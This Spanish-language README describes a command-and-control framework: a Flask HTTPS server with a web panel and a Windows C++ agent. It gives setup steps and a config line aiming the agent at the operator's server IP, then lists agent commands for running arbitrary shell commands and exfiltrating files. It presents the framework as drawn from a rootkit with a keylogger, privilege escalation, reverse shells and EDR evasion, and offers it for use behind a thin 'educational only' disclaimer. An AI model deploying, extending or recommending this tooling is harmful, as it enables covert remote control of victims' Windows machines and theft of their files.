
Framework C&C sobre HTTPS con balizas cifradas, panel web y agente para Windows.

Infraestructura de Comando y Control HTTPS con panel web para la gestión remota de agentes Windows.
⚠️ Solo para uso educativo - El uso ilegal es tu responsabilidad.
Servidor:
cd server
pip install flask
python c2_server.py
Accede al panel: https://localhost:8443
Cliente:
build.bat
Edita client/c2_client.cpp para configurar la IP de tu servidor:
wstring c2ServerUrl = L"https://YOUR_SERVER_IP:8443";
Cifrado: XOR + Base64
Clave: Hostname + Username + "SecretKey2025"
Transporte: HTTPS (puerto 8443)
Agente → POST /api/checkin → Servidor (obtener comandos)
Agente → POST /api/result → Servidor (enviar resultados)
Servidor: Python 3.9+, Flask
Cliente: MinGW-w64 GCC 15.2+, Windows SDK, C++17
Este marco C2 se ha extraído del proyecto XvX Usermode Rootkit. La versión completa del rootkit incluye un C2 más completo con más de 15 comandos, que incluyen ocultación de procesos/archivos/registro, escalada de privilegios a SYSTEM, shells inversas interactivas, funcionalidad de keylogger, inyección DLL y técnicas de evasión de EDR. Esta versión independiente proporciona la infraestructura C2 principal con fines educativos y para una fácil integración en proyectos personalizados.
Autor: 28zaakypro[@]proton[.]me
| Comando | Sintaxis | Descripción |
|---|
shell | shell <comando> | Ejecutar comando de shell |
exfil | exfil <ruta> | Exfiltrar archivo (Base64) |
sleep | sleep <segundos> | Cambiar intervalo de beacon |
ping | ping | Probar conectividad |
die | die | Terminar agente |